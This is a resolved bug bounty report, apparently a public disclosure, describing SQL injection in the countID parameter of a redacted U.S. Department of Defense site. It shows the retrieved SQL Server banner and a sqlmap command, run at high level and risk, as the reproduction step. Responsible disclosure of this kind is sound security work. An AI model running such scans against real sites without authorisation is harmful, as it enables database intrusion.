SQL Injection on www.██████████ on countID parameter
High
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
0_1vitthal
Vulnerability Details
Technical details and impact analysis
**Description:**
Hello Team,
I have came across a sql injection vulnerability on www.██████ on countID parameter. I was able to retrieve the banner which is
> Microsoft SQL Server 2008 R2 (SP3) - 10.50.6220.0 (X64&
Mar 19 2015 12:32:14
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
after confirming the vulnerability i have stopped testing further.
**Vulnerable URL:**
https://www.███/public/saveCount.cfm?countID=4
**Steps to Reproduce:**
1. python sqlmap.py -u https://www.██████████/public/saveCount.cfm?countID=4 --level=3 --risk=3
**POC**
█████████
## Impact
Attacker can take control over the database server.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
SQL Injection